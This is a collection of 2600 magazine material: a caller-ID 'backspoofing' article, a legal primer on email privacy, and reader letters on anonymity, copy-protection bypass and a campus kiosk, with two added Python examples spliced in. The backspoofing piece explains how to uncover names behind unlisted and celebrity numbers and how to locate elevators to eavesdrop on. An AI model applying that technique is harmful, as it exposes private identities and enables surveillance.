There are many different ways to download streaming content and this is the way I use. I thought I'd share this method with you all since I have met many people who do not know how to download streams. I encourage you to play around with both WMP and SDP. You might find a more efficient way of downloading streams. Enjoy!

by Natas
natas@oldskoolphreak.com
What exactly is backspoofing? Most people reading this article probably have never heard of the term "backspoofing" before and don't know that the term was coined somewhat recently by a fellow phone phreak named NotTheory. Backspoofing is a very simple, but useful technique. Essentially, it is just calling yourself with spoofed Caller ID for the purpose of getting the CNAM (Caller ID Name) associated with a particular number. The number you spoof as your Caller ID is the number that you want to receive Caller ID name information for. I believe that this will work with almost any 10 digit number within North America. To do this properly you usually need to be calling a POTS line, because POTS lines are the only kind of lines that offer Caller ID with name, not just Caller ID number. However, some VoIP providers these days are now offering Caller ID name service to compete with all the features available on traditional POTS lines. It should also be noted that cell phones do not provide Caller ID with name on incoming calls and probably never will, as the name always tends to be retrieved from the local database on the phone.
How does backspoofing work? How is the CNAM retrieved from a number? Well, when you spoof your Caller ID to a telephone line with Caller ID name, what happens is the receiving telephone switch does a lookup
in what is known as a CNAM database via the SS7 (Signaling System 7) protocol. This receiving switch dips in and retrieves the name associated with the particular number from the CNAM database and displays it on your little Caller ID box. Now you might be asking why this is the least bit interesting or how it's useful. Well, it's extremely useful because it allows you to see information that may otherwise be private. The telephone companies figure that even if you're some big shot movie star or even if you have an unlisted number, the person receiving your calls should still be able to see the name and the number of the person calling. After all, that's why they're paying for Caller ID. So the telco puts your name and number in their enormous database that's constantly being updated. Even unlisted numbers will typically come back with a first and last name if it can all fit into the 15 character space designed for the Caller ID name. This all works because you're tricking the Caller ID service into looking up the CNAM information associated with the telephone number of your choosing. I like to think of these CNAM databases as a private reverse lookup directory!
At first backspoofing may not seem like the best thing in the world, but there are lots of applicable uses for something like this, especially if you're a phone phreak! Ever find a local "elevator number?" The ones that connect you to the phone inside an elevator, allowing you to listen in on the elevator or
speak to the people inside? Well... by backspoofing an elevator number you can see what the name comes back as. Usually this is the name of the company whose PBX the elevator number is on or the company that occupies the building that the elevator is in. Now all you would have to do is look up the company's address and find out where the building is and you can find out exactly what elevator you're listening to! This actually came in extremely handy for me. For about five years now, I've had elevator numbers that were supposedly at Brown University but I was never really sure. By simply backspoofing the number I was able to confirm this within a few seconds.
Telco test numbers are some of the greatest things to backspoof, because even test numbers have CNAM entries most of the time. When I first started backspoofing, I assumed test numbers would have discreet listings, but oftentimes they list the telco's name or even a little description about the number! Someone even showed me a modem that came back as "NET 5-ESS" which is a telephone switch made by Lucent. So it was pretty obvious what turned out to be connected to that modem! If you're doing a scan and you're not sure who a particular modem belongs to, backspoofing comes in very handy! I always like to see what milliwatt numbers, and other numbers around the milliwatt number, come back as. Maybe you have some numbers to your telco and you're wondering exactly what bureau the number belongs to? Backspoofing can sometimes tell you if you've reached RCMAC, the switch room, MLAC, Information, or the code for a particular wire center.
Also, you can see just how lazy telcos are and how long some test numbers have been the same, because I've found entries with old telephone company names that are long gone! When was the last time you saw "NYNEX" or "NEW ENGLAND TEL" calling you?! These companies ditched those names years ago, but there are still plenty of CNAM entries out there with those names.
Cell phone numbers are no exceptions to the rules of backspoofing either! T-Mobile currently enters their customers' names into CNAM databases. I believe Sprint is now starting to do the same. So if you're looking for a famous celebrity's cell phone number and you know they've got a T-Mobile account, backspoofing can come in very handy. Try backspoofing an entire T-Mobile exchange served out of the Hollywood Hills and see how many famous names you recognize!
Beware that all CNAM providers are not equal! There are lots of different CNAM databases in use, and while most of the information is the same, some databases have conflicting information. It may just be that some databases are not updated as frequently or it may just be that a certain one sucks and contains lots of outdated entries. I've found CNAM entries that were different, depending on the carrier who provided my Caller ID name service. I would get one result with Verizon and another with AT&T. There really is a lot of funky stuff that goes on in the world of CNAM.
To close the article, I want to show you just how cool backspoofing is. I've put together a list of some of the most interesting examples which I've found through backspoofing. Keep in mind that phone numbers do change quite often, so unfortunately some of these examples may be gone by the time this article comes out.
Shouts: The DDP, Not Theory, Nick84, Decoder, Lucky225, Doug, Majestic, IcOn, GreyArea, Mitnick, Agent Steal, Poulsen, StankDawg, Dual, Cessna, Vox, Strom Carlson, IBall, Avld. The revolution will be digitized!
Spring 2007Page 31

by Lex-M, Esq.
lex@successfulseasons.com

I've given a few talks at hacker conferences and there are a lot of misconceptions about the laws that govern what we can and can't do. While most legal issues are discussed in articles longer than an entire copy of 2600, I'd like to give a quick overview on reading email - can you read other people's, and who can read yours?

IANAL, this is not legal advice. While I am an attorney, I'm not your attorney. I'm going to talk about U.S. Federal law, namely the Stored Communications Act and the Wiretap Act. Many U.S. states have their own laws on this topic that mirror Federal law or work slightly differently. Other countries have their own laws, and it seems that the U.S. government doesn't even follow their own. If you have any questions about specific facts or your own case, contact an attorney. That said, let's have some fun.

The Stored Communications Act (SCA) bars unauthorized people from intentionally accessing an "electronic communication service facility." It also prohibits authorized users from exceeding their granted access and obtaining, altering, or preventing the delivery of another's electronic communication (EC) that is in storage. There's a second set of laws, commonly known as the Wiretap Act or the Electronic Communications Privacy Act (ECPA) that deal with EC in transit.

"Storage" here is what attorneys call a "term of art," which means that it doesn't mean what you think it means. Storage under the SCA includes any time the EC stops, even for a microsecond. Consider this hypothetical: I email this article to 2600. My email server holds onto the email while it figures out how to route it. It's in storage, if only for a tenth of a second, so it's covered by the SCA. The email server breaks it into packets and sends it to its upstream router. Now the packets are "in transit" until they make it to the router. The packets are in storage when in the router's memory. They're also in storage if I have my email client save sent mail.

Yup, "EC" is a vague term too. Since ECs aren't defined by the SCA, any new method of digital communication is likely to be covered. Messages on BBSes, web forums, email, IMs, pages, and cell phone text messages have already been ruled to be covered by the SCA.

Since the outcome of many legal issues depends on who you are and what you're doing to whom, the following chart should help.
Who are you?                 Whose EC are you looking at?   OK?
Intended recipient           Yours                          Yup (1)
Inadvertent recipient        Someone else's                 Yup (2)
Intentional recipient        Someone else's                 Nope (3)
Email provider (public)      User's                         Maybe (4)
Email provider (private)     User's                         Maybe (5)
Police                       Someone else's                 Maybe (6)
(1) The intended recipient can always read their own stuff, at least under the SCA.

(2) If you get an incorrectly addressed email, or if your email system misroutes someone else's email to you, you're OK, as long as you didn't do anything to get that email. Mind you, if you asked someone else to get you the email, and neither of you are authorized to see it, it's not inadvertent.

(3) If you intentionally exceed your granted permissions and access or modify someone else's EC without their permission or prevent them from getting it, you've violated the SCA and are potentially up to one year in prison and fines, or five years if you do it for profit or "malicious destruction". Here's the fun part: The law isn't quite sure what "exceeds authorized access" means yet.
(4), (5) A provider of an "electronic communications service" or their workers can look at ECs stored on their systems. Providers who offer their service to the public, such as ISPs or cell phone companies, can't divulge the contents of ECs, except to deliver the message to the recipient, or when served with a valid subpoena or search warrant. Also, a public provider may forward an EC to the police if they believe it contains an imminent threat of serious physical harm to another, and that the provider inadvertently noticed the threat. A private provider, such as a university or business that offers email only to their workers, may be able to divulge the contents of emails if they want to. It's a gray area, which is why lots of employers make you sign a release when they give you an account on their systems. That way they're protected either way.

(6) The police can acquire the contents of ECs with a valid search warrant, which requires that there is probable cause that the emails are evidence of a crime. The police can also read ECs if the recipient allows them.

So what exactly is a "provider" under these laws? While it's not explicitly defined in the law, the common law system (what the U.S. uses) allows judges to look at previous court cases to guide them. So far, if you own the service and decide if others get to use it, you're a provider. So if you run a Linux box and give your friends or employees mail accounts, you're a provider. If you let anyone use the system for a fee, you may be a "public provider."
What About Sniffing?

What happens if you don't get their communications from storage, but sniff it from the wire or from wireless? In most states, the SCA no longer concerns you. However, the Wiretap Act does come into play. Intercepting ECs without authorization by the recipient or law may result in up to five years imprisonment, open you up to civil suit by the victims, and a fine. The "authorizations under law" is an interesting list. You can look at ECs on the network if you:

1. Get permission from the recipient of the EC.
2. Are the intended recipient of the EC.
3. Are intercepting transmissions intended for the general public, persons, ships, or aircraft in distress, police/fire/emergency, CB band, or amateur radio. Note: encrypted transmissions are not considered "for the public".
4. Are investigating a source of "harmful interference" to authorized radio or consumer electronics, as long as the interception is only to determine the source.
5. Are an employee of the FCC if intercepting EC is within their job description.
6. Are a provider of an electronic communication service and the interception is:
a. Necessary to provide the service or
b. Necessary to protect the rights or property of the service or
c. To comply with a court order or wiretap warrant.
d. Employees of the above can be protected under the "provider" exception if the interception is within their job description.

There's some other stuff about allowing the President (and his employees) to conduct foreign intelligence, but what that means isn't going to get figured out for a while.

What's interesting is that "providers" are allowed to do a lot more with ECs when they're in storage than when they're being transmitted. That may be changing soon. There's a recent court ruling that seems to limit what providers can do with ECs on their systems.
To Recap

You can read your own mail. If someone sends you stuff by mistake, you can read it. If you break into someone else's server, you're in trouble. If you're allowed in the server, but get root by some nefarious means, or guess your ex-girlfriend's Hotmail password to read their mail, you're in trouble. If you want to test out a sniffer, get permission from the owner of the network.

There are some gray areas in the law, such as who can grant permission to view ECs and what constitutes permission. Does letting a user sudo grant permission to read other people's stuff? If I give my root login to someone else and they read your email, did I grant permission to do it? All these are interesting questions and they haven't been answered by the courts yet. Of course, every one of these questions will have to be answered by a real case, with victims and defendants. Nobody wants to be a test case.

Be careful out there. If you do get busted or sued, keep your mouth shut and talk to a lawyer.
Dear 2600:
I have some observations that I would like to submit for your approval and potential publication. After noticing the "Writers Wanted" text block on Page 50 of 23:3, I have decided it is my time to contribute to the cause.
Most of the material that I have is based upon my work. I am presently a contract telecommunications technician with experience in carrier-class transport, some switching, data networks, and access devices. Prior to this I worked as lead technician for an avionics center where I dealt with several prominent entities in aerospace.
My concern comes for both my safety, the security of my customers, and the future of my career. Can I write in anonymously? Does 2600 Magazine protect its writers?
Name Deleted
Assuming that was your real name that you signed your letter with, we'll start by encouraging you to protect your identity at the source. We always honor the requests of our contributors with regards to identification and it is our policy not to reveal any of our writers' personal information without their express permission. That said, we all must recognize that there are potential risks whenever mail is sent with identifying information which can be anything from the return address to information inadvertently included in the article which can lead people to figure out who you are, particularly those in your organization who may be trying to find the source of a leak. So for those readers who worry about this sort of thing, we advise caution with regards to any personal information that may be referenced in the article (locations, encounters with other people, etc.) and details which could be gleaned from either the email address itself or from the fact that someone used their internal corporate address to send mail to someone at 2600. Often just the fact that contact was made is enough to raise questions. Even without knowing the contents of the email that user@evilempire.mil sent to articles@2600.com, you can bet the powers that be will be keeping a close eye on the sender and preparing his interrogation chamber. So the short answer is that we will do everything to protect your identity. But you must also exhibit a good degree of caution if you want to preserve your anonymity.
Dear 2600:
Sometimes I want to send an anonymous email to various media organizations and I want to make sure I'm being very anonymous. What I would do is go find an insecure wireless network, like at a coffee shop for example, and connect to it with my laptop. I would open up Firefox and make sure that all of my web traffic went through Tor (I would use the FoxyProxy extension for Firefox, with Firefox, Tor, and Privoxy installed on an Ubuntu system). I would then surf my way over to hushmail.com and create a new account. I would choose Hushmail because not only are they a privacy organization and are unlikely to share any of my user information if asked (and in fact, according to their website, they don't actually know any of my user information without my passphrase because of the way it gets hashed), but also because it has an SSL certificate and it just makes me feel safer, even if my traffic is going through Tor. Then I would log in, email my message to the media, and log out. Then I would clear all the private data in Firefox (my cache, history, cookies, etc.). I would securely delete all files involved with the message on my computer (I use the wipe package). All the while, I'd make sure no one was looking over my shoulder. Then I would turn off my computer and leave.
Are there any holes? Is there anything further I should be doing? I wouldn't spoof my MAC address because my wireless card doesn't allow it, but it seems like that wouldn't even be necessary. Or is it? Would it be worth buying a new wireless card? Is there any possible way that I could get tracked, by local police, feds, Homeland Security agents, members of the media, or anyone else?
A. Saboteur
We can say with assurance that the media lacks the skills to do much beyond resolving an IP found in the headers of your email. If you really want to test your system, sending a threat to the White House or announcing the grand opening of a new al Qaeda chapter would get far more talented people involved in the challenge. (We really don't suggest this method.) Our readers can most certainly help find any potential holes in your scheme. The one we would point out is the danger of using the same email address for other communications since more identifying information might be found if someone were to somehow find multiple messages from the same address, particularly any to a public forum.
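The reply's one concrete technical point is that a recipient can resolve an IP address found in the message headers. To make visible exactly what that means, here is an added example (not from the letter writer or from 2600) that parses the Received chain of a constructed message with Python's standard email module and reports, hop by hop, which public addresses a plain recipient gets to see. The first hop is the one a webmail provider stamps with the address the browser session arrived from, which is the line the letter's Tor step is meant to keep uninformative. Every host name and address below is a documentation value, and the helper names are this example's own.

```python
"""What an ordinary recipient can read out of an email's Received headers.

Added example, not from the letter or 2600's reply. The message is
constructed; every host name and address in it is a documentation value.
"""
import email
import re

# Constructed message. Many webmail services stamp the browser's address
# into the first Received line; two relay hops then carry it to the inbox.
# Headers are listed newest first, as they appear in a real message.
SAMPLE = """\
Received: from mx2.example.net (mx2.example.net [198.51.100.20])
\tby inbox.example.org with ESMTP id 42; Tue, 13 Mar 2007 10:01:02 -0400
Received: from webmail.example.com (webmail.example.com [203.0.113.7])
\tby mx2.example.net with ESMTP; Tue, 13 Mar 2007 10:01:00 -0400
Received: from [192.0.2.55] (helo=client) by webmail.example.com
\twith HTTP; Tue, 13 Mar 2007 10:00:58 -0400
From: tipster@example.com
To: newsdesk@example.org
Subject: tip
Message-ID: <20070313140058.0001@example.com>

Body text.
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# RFC 1918, loopback and link-local ranges say nothing about the origin.
NON_ROUTABLE = re.compile(r"^(10\.|127\.|192\.168\.|169\.254\.|172\.(1[6-9]|2\d|3[01])\.)")
HOP = re.compile(r"from\s+(\S+).*?\bby\s+(\S+)", re.S)


def received_chain(raw):
    """Received headers oldest first, i.e. in the order the mail travelled."""
    msg = email.message_from_string(raw)
    return list(reversed(msg.get_all("Received", [])))


def hops(raw):
    """One (from_host, by_host, public_ips) tuple per relay, oldest first."""
    out = []
    for line in received_chain(raw):
        m = HOP.search(line)
        frm, by = (m.group(1), m.group(2)) if m else ("?", "?")
        ips = [ip for ip in IPV4.findall(line) if not NON_ROUTABLE.match(ip)]
        out.append((frm, by, ips))
    return out


def originating_candidates(raw):
    """Public addresses in the earliest hop: the most a plain recipient can
    resolve toward where the message was written."""
    chain = hops(raw)
    return chain[0][2] if chain else []


if __name__ == "__main__":
    for frm, by, ips in hops(SAMPLE):
        print(f"{frm} -> {by}  public IPs: {ips}")
    print("origin candidates:", originating_candidates(SAMPLE))
```

Run against the constructed message, the earliest hop yields 192.0.2.55, the address the webmail server saw the browser connect from; the later hops only name the provider's own relays. Any header a relay chooses to add before the first Received line (the webmail "from" stamp here) is outside the sender's control, which is why the reply's point about reusing an address matters as much as the network path.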
Dear 2600:
In issue 23:4, I think vyxenangel's statements are a little misleading. In the movie Hackers, the characters in the film talk about a "righteous hack" on a Gibson and "not any of this accidental shit." The film has very good visual effects but you don't learn a thing about hacking. The subway defense system I thought was good. It was used by a young Angelina Jolie, who played a hacker called Acid Burn. Don't try this at home.
My question is: In the film, the cover of your magazine appears in a scene. Do you know which issue they used in the movie?
mr.bitworth
We were hoping you could tell us since you've obviously seen it somewhat recently. You can find a full list of our covers on our website. It's most likely one of the 1994 covers and was used in the car scene where one law enforcement agent is reading lines from the famous "Hacker Manifesto" by The Mentor, which, by the way, never actually appeared in our magazine. As for the original letter, we believe a degree of sarcasm was part of the overall theme.
Dear 2600:
Twice now I have opened my cell phone to see I have a voice mail and when I connect to my mailbox and play it, I only hear music. No voice, and my phone doesn't say I missed a call. I played the music for ten minutes the first time and it didn't stop, though it looped. I have Verizon service. Can anyone tell me what on Earth is going on?
about:blank
Someone is calling you and playing music. It
happens. Sounds to us like you're getting some sort
of telemarketing call where they don't have enough
operators so they actually place people on hold when
calling them. It could be something else though,
like someone really trying to waste your time and
succeeding in wasting their own. The fact that your
phone doesn't ring could be because of a number
of reasons, including flaky service or someone
dialing directly into your voice mail greeting to avoid
ringing your phone. You should also be able to get
envelope information in the voice mail message that
may reveal an originating phone number. If there are
other possibilities, we will no doubt hear of them
from our readers.
Dear 2600:
I was wondering if any readers or if anyone over at 2600 has heard of the new "Photobucket Login" exploit. Apparently the exploit has the ability to turn any Photobucket account into a "guest" account. What this means is that upon the login screen you wouldn't need the root password. All you would type into the password box is the word "guest" and, boom, you now have "read only" privileges to the once password-protected account. How does this work? And who has heard of it?
The Laguna
We're not familiar with it but this really sounds a bit too simple to not be intentional or completely untrue.
Dear 2600:
I wrote an article in January 2007 but I wrote it in Spanish. I can translate it but it won't be any better than if you translate it. So I propose to send it to you in Spanish and you can translate it.
Vidor
You have a frightening amount of faith in our abilities. Even if we did have the skills needed to do this (and we don't), there simply isn't enough time to translate languages on top of all of the other editing tasks involved in a typical issue. That said, we would be thrilled if someone could figure out a system of translating submissions to us so that more people from around the world could submit articles. Until that happens, you're best off translating it as best you can. Your grammar and spelling will probably come out better than that of many native English speakers.
Dear 2600:
Are articles for 2600 still accepted at articles@2600.com and is a lifetime subscription to the magazine still offered if the article is used?
d
That's our address but we never offered a lifetime subscription for articles. You get a year and a shirt if it's used. If the article is particularly in depth, then you get two years and two shirts. Years can also be applied to back issues.
Info
Dear 2600:
I am a long time listener and magazine subscriber. Listening to and reading your recent election and e-voting stories made me think I should let you know how it works here in Australia.
If you are born here and go to school like normal then when you turn 18 you are automatically added to the local electoral roll and sent a letter to confirm this, outlining your responsibility to vote and also outlining the penalties for not voting. You then turn up at the local voting booth on Election Day, always a Saturday from 8 to 6 at the local schools. You walk in through a few spruikers handing out how-to-vote cards for different parties and mosey on over to a desk (if you get there at the right time when there is no queue). They ask you your name and address, they ask if you have voted already today, they never ask for any ID, then the nice volunteer crosses your name out and hands you the voting papers. You get two papers: a large white one (last election this was two feet wide) and a small green one around the size of a 2600 Magazine. You take your papers over to a cardboard booth and fill them out a little awkwardly, then fold them up into a square and pop them into
cardboard boxes.
The ballot papers are unreal. The white (House) one has about 30 to 50 boxes to fill out with numbers starting with one for your first vote, then you keep going with the second and so on... or you can just put a one in the top section of the paper for the party you want and you will get whatever that party has chosen for its preferences. As you can see, this has its own problems with preference deals and the like.
There is another legal vote. That is, if you just put a one in one box for one candidate only, then that will be counted but only in the first round. When your choice is among the lowest pile of votes then your vote will be discarded with no preferences. Normally it would then go to number two, then three, and so on until there were only two piles of votes and a winner was declared. While this is a legal vote, it is a federal offense to actually let anyone know about it. People have been arrested for handing out how to vote cards that promote this type of vote.... The green (Senate) paper is much simpler with only five to seven boxes to number.
The problem with the preferential voting system is that my vote will always end up with one of the two major parties in most cases and not always the one you prefer, unless you fill out every box on the paper and put that candidate last.
The system is open to many simple hacks but it doesn't really happen to any extent. There are a lot of unfilled papers and invalid votes though.
Breto
The system you describe is known as Instant
Runoff voting. Basically it saves the trouble of having
to hold multiple elections, otherwise known as
runoffs, to determine who the ultimate winner is.
This system is used in some parts of the United States
and may catch on in the future. Most people seem
intimidated by it because of its seemingly complex
nature.
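The count Breto describes (a single-preference paper counts only until its candidate's pile is eliminated and is then discarded, while fully numbered papers flow on to their next preference until one pile holds a majority) is easy to get wrong in the details, so here is an added worked tally in Python. It is not part of the letter or of 2600's reply: the candidates and ballots are constructed, the blank and mis-marked papers stand in for the informal votes the letter mentions, and alphabetical tie-breaking is an assumption of this example rather than any electoral rule.

```python
"""Instant-runoff count of ranked ballots.

Added example, not part of the original letter or 2600's reply. The
candidate names and ballots below are constructed for illustration;
real electoral rules for formality and tie-breaking differ by jurisdiction.
"""

# Constructed sample. Each ballot lists candidates most preferred first.
# A voter may rank only some candidates (the "one in one box" vote the
# letter describes ranks a single candidate). Blank papers and papers that
# name someone not on the ballot are informal and are set aside.
CANDIDATES = {"Alpha", "Bravo", "Charlie", "Delta"}
BALLOTS = [
    ["Alpha", "Bravo", "Charlie", "Delta"],
    ["Alpha", "Bravo", "Charlie", "Delta"],
    ["Alpha", "Charlie", "Bravo", "Delta"],
    ["Alpha", "Charlie", "Bravo", "Delta"],
    ["Bravo", "Charlie", "Alpha", "Delta"],
    ["Bravo", "Charlie", "Delta", "Alpha"],
    ["Bravo", "Alpha", "Charlie", "Delta"],
    ["Bravo", "Delta", "Charlie", "Alpha"],
    ["Charlie", "Bravo", "Alpha", "Delta"],
    ["Charlie", "Delta", "Bravo", "Alpha"],
    ["Delta"],           # single preference: counts until Delta is eliminated
    [],                  # blank paper: informal
    ["Echo", "Alpha"],   # unknown candidate: informal
]


def validate(ballots, candidates):
    """Split papers into formal ballots and a count of informal ones.

    A ballot is formal if it is non-empty, names only known candidates,
    and ranks no candidate twice.
    """
    formal, informal = [], 0
    for paper in ballots:
        if paper and len(set(paper)) == len(paper) and all(c in candidates for c in paper):
            formal.append(list(paper))
        else:
            informal += 1
    return formal, informal


def instant_runoff(ballots, candidates):
    """Count ranked ballots by elimination.

    Returns (winner, rounds, exhausted): `rounds` holds each round's tally
    in order, `exhausted` the number of formal ballots that ran out of
    preferences before a winner was declared. Ties are broken alphabetically
    here; that is an assumption of this example, not an electoral rule.
    """
    live, _ = validate(ballots, candidates)
    remaining = set(candidates)
    rounds, exhausted = [], 0
    while True:
        tally = {c: 0 for c in remaining}
        still_live = []
        for paper in live:
            prefs = [c for c in paper if c in remaining]
            if prefs:
                tally[prefs[0]] += 1   # counts for its highest surviving preference
                still_live.append(paper)
            else:
                exhausted += 1         # no surviving preference: discarded
        live = still_live
        rounds.append(tally)
        leader = max(remaining, key=lambda c: (tally[c], c))
        # A majority of the ballots still counting, or the last candidate
        # standing, ends the count.
        if 2 * tally[leader] > len(live) or len(remaining) == 1:
            return leader, rounds, exhausted
        # Otherwise the lowest pile is eliminated and redistributed.
        loser = min(remaining, key=lambda c: (tally[c], c))
        remaining.remove(loser)


if __name__ == "__main__":
    winner, rounds, exhausted = instant_runoff(BALLOTS, CANDIDATES)
    for n, tally in enumerate(rounds, 1):
        print(f"round {n}: {tally}")
    print(f"winner: {winner}, exhausted ballots: {exhausted}")
```

With these ballots Alpha and Bravo tie on first preferences, the lone "Delta only" paper is exhausted as soon as Delta's pile goes, and Charlie's two papers both flow to Bravo, who wins the final round 6 to 4. That is the effect the letter complains about: where a vote ends up depends on how the preferences below the first are filled in, or not filled in.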
Dear 2600:
I'm writing this in regard to "Ringtone Download Folliez" from 23:3. I was eager to try this out but every ringtone I saw that I wanted was stored in a .swf file. I did some research on .swf files and found that they were multi-part, meaning that the ringtone was stored someplace other than the .swf file itself. So I got on Firefox, enabled the live http headers add-on, checked the request box, and reloaded the .swf page. I then checked live http headers and found exactly where the music file was stored (e.g., http://content.ringtonio.nl/swfp/STREA21175.SWF). Then I saved the page and changed the file from swf to mp3 with a free file converter. I hope this helps.
Also, 23:3 was the first 2600 Magazine I've gotten. My sister knew I loved computers so she got it for me. We were both astonished when we saw my old small town elementary school on the back cover (Mountain View Elementary School, Manchester, GA). I now have a subscription and look forward to future issues!
Daniel moore
It certainly is a small world, isn't it?
Dear 2600:
In response to lupO's letter in 23:3 about concern for potential privacy infringements made by Cox Communications, I would like to share what little I do know about how most of these "copyright infringements" are handled. First off, I worked for Cox for over two years as a lowly technical support agent handling calls from every last Jim-Bob and Cletus in the area about their Internet service, so let's just say the mandatory beforehand experience requirements for employment were not very impressive. But in all truthfulness, most of the floor agents are given an absurd amount of run-around when asking any questions that dealt with the world outside of the cube. If a customer called in complaining of nonfunctioning service, we would pull up their account and notice that it had been "flagged" by the corporate office in Atlanta. The next step would be to access another web-based utility that allowed us to see all types of issues related to the customer's account categorized by modem MAC. In the case of "copyright infringement," there would actually be a copy of a facsimile from the corresponding entertainment conglomerate (i.e., Warner Brothers, Fox, etc.). It would be a simple letter from the company's legal team informing Cox of the copyright issues. They would never go into detail, but would always say something humorously nonchalant about "happening to notice" or some crap like that. They would then present Cox with the conditions for handling the customer's account. They would request that the customer be informed of the infringement and given notice that service would be terminated upon another violation. They wanted two strikes and you're out, but the general rule was three. I tried investigating into this as much as possible but no one seemed to have a clue about how they found out or didn't seem to care. And unfortunately most snooping was difficult with the constant physical monitoring and the ever watchful screen capture software that, for some reason, they frowned upon being disabled. Now I am no longer employed there and so I don't have access to easily research anymore. And, by the way, a simple IP address anonymizer seems to be an easy way around this. I never saw any issues arise from people that I knew to be using such software. And 2600 staff, thanks for a continually great publication.
NOvusOpiate
Dear 2600:
A week or so ago from Borders I bought a Bad Religion CD called Punk Rock Songs. The CD was an import from Germany that included many obscure tracks that I really really wanted. When I got home and popped it into my Xbox to burn and make my personal copy, the disc wouldn't play. It was labeled in German that it "will not play in a PC/Mac." As the Xbox is just a dressed up PC, I kinda got paranoid, remembering that situation where Sony got sued for spyware that buried itself in root. So I wouldn't even consider placing it into my computer to burn. I got to thinking of alternative methods to get the information cut into my legally protected right for personal copies of music. Plus I always burn a copy just in case the original becomes inoperative.
I'm not that familiar with the copy protection software from Sony and I wanted to keep it quarantined from my box. I just wanted to find a way to create high quality copies of the music from the CD onto my hard drive. Then it dawned on me. Use a portable CD player and a double ended headphone jack cord you can find at Radio Shack (1/8th stereo mini plug to 1/8th stereo mini plug) and a program like Audacity, which is used to record your audio input, as most media players don't quite do that anymore (http://audacity.sourceforge.net/).
It's extremely simple. You connect the "line out" on the CD player (or even the headphone out) to the cord. You connect that cord to the back of your computer at the "audio in." Play the CD and use the program to record the tracks. It's a hardware variety bypass of the copy protection software on the CD.
Many people I figure already know about this, but I felt like informing the masses about a bypass of all security devices on a copy protected CD (so you can essentially quarantine the disc as I don't trust a Sony disc in my drive). It doesn't matter what program is used to protect the CD as you are just recording the audio going into the computer and it's being played in a "dumb" CD player so it will bypass the code that prevents it from being played on the computer drive. My computer is ancient but I have this feeling that the same can be done with outside video sourced from RCA jacks or cable or whatever. Of course there are software ways to do this, but I wanted to remind people that there are hardware ways to get these things accomplished as well.
Rae
Dear 2600:
I'm a philosophy student at Mount Allison University in New Brunswick, Canada, and an avid reader of 2600. Recently my school switched dining services from Sodexho to Aramark, and with the changes came an interesting little novelty hidden away in the corner. They installed a little computer called the PioneerPOS (Point Of Sale is my guess). This is officially for nutrition information and a menu for the week. Also officially (although somewhat unadvertised for now), it's used for buying snacks from Aramark. Aramark has the food monopoly on campus and so any food sold on the campus is from them.
I happened to be eating near it when I noticed there was a tiny box on the touch-sensitive display. There was a program update for "GoToMyPC" which is used for remote access. Although this is a guess, I think that the program takes the sales from the machine and sends them to the central corporate headquarters, which then orders the outlets what to do. Anyhow, I clicked the box and it rebooted the machine, which led to a wealth of information. The motherboard is American Megatrends and the OS is Windows XP Embedded. It booted to the desktop and I navigated the touchscreen with a pen cap (fingers would be too difficult and it was necessary to get the toolbar from "auto-hide").
I checked the programs it had installed, which were CampusDishKiosk, GoToMyPC, and Norton Antivirus. It also had Windows Media Player 10 and the default songs that come with XP (David Byrne cranked up loud on this machine was quite humorous). The machine was three gigahertz and had 1.99 gigs of RAM, which seems like incredible overkill for a machine that is more or less terminal. It was connected to the campus network, so I had no way to identify exactly where the information obtained on this computer went. There were two hard drives, one of which held the system information and one that held two .GHO files. One drive was roughly 700 MB and the other was about 1.2 GB.
I'm not exactly sure what information is on that machine. However, from my little investigation, I gather it wouldn't be too difficult to dig into actual student numbers and purchases, assuming the information is initially stored on one of the hard drives. This makes me rather paranoid about the way these card-swipe units are used. Mount Allison is new to using magnetic stripe IDs and I worry that the machines it will be utilizing now and in the future will continue to be insecure and vulnerable.
Thanks for a great mag!
Local Luminary
Dear 2600:
I am a new subscriber to your magnificent magazine, enjoying the extended access to new technologies through you and Maximum PC, and a resident of Pennsylvania's D.O.C. I'm writing in response to soursoles' letter concerning AIM relay for prisoners. The rumor of Internet access in prisons, Pennsylvania's at least, is just that. A rumor. Unless an educational course requires it, inmates aren't permitted to see a computer, let alone touch one. What little access I have had has shown a basic network with no Internet access. Security is surprisingly lax but I attribute this to the basic inmate population being your usual Layer 8 idiots. Should I come across something with potential I'll be sure to share.
The phone system itself was upgraded to an automated system some time back. Since the upgrade, all phone numbers are pre-approved before calls are permitted. Even then calls are limited to one or two a day, depending on your custody level. Calling cards are an option. This is just a credit to your account with the phone company, not an actual card. Unfortunately the cheapest card for us is the equivalent of a minimum wage employee on the street paying $375 for a 40 minute card. That is a whole other can of worms though.
I appreciate your efforts in trying to aid family/friends of the incarcerated. It almost reminds me of what it's like to be amongst people again.
Thank you 2600 for your notice of the need for change. Most people would sooner forget about us and our friends and families than help speak out about injustices we endure.
SN
In recent months there has finally been attention given to the horribly unfair telephone rates forced on prisoners and their families. We have a very unhealthy attitude of forgetting about our incarcerated citizens and, in fact, treating them as if they were subhuman, regardless of the actual circumstances behind their imprisonment. As more and more of us are found guilty of one thing or another, this mentality is really going to wind up biting us in the ass.
Stories
Dear 2600:
My boss is a "sysadmin" in our department. Unfortunately, I'm the "assistant." I would like to share this short but funny story. I was browsing around his files on the network the other day, which he hasn't restricted access to, and found a very short document detailing the implications of unauthorized access to our only UNIX server using the root account.
The document is so short it is funny. My boss knows zero about UNIX, and it appears he thinks no one else does either! Here are his statements:
"Root cannot be accessed remotely you need to be in front of the server." (A modem is hooked up to the server and is clearly visible). "To do any damage on the UNIX server using the root account, you would need a good understanding of UNIX."
Anyway, keep up the great work with the mag, Off The Hook, and Off The Wall.
brill (England)
It's not hard to see how someone could reach these conclusions. Lots of servers don't permit remote logins to root. But of course you can still become root remotely in a number of different ways, authorized and unauthorized. Not knowing this may give someone a false sense of security. But it's a lot harder to figure out how someone could think that you can only screw something up by having a good understanding of it. If anything, the opposite is true.
Dear 2600:
A few months ago I wandered into a Cingular retail location and wanted to find out how much information about my account they had access to. I acted as if I wanted to pay my bill and had some other questions about my account. I told one of the sales reps my cell number and he punched it into the computer and up came all of my info, including my address, date of birth, last four digits of my Social Security Number, and call history. I watched the screen as he looked at my account. Unfortunately, the rep didn't even know who I was since he didn't ask me to identify myself nor did he ask for the passcode I explicitly told Cingular to put on the account when I first got service. More astonishingly, the passcode was displayed in plaintext on the computer screen in red color! I assume he was supposed to ask me to confirm it. Oops.
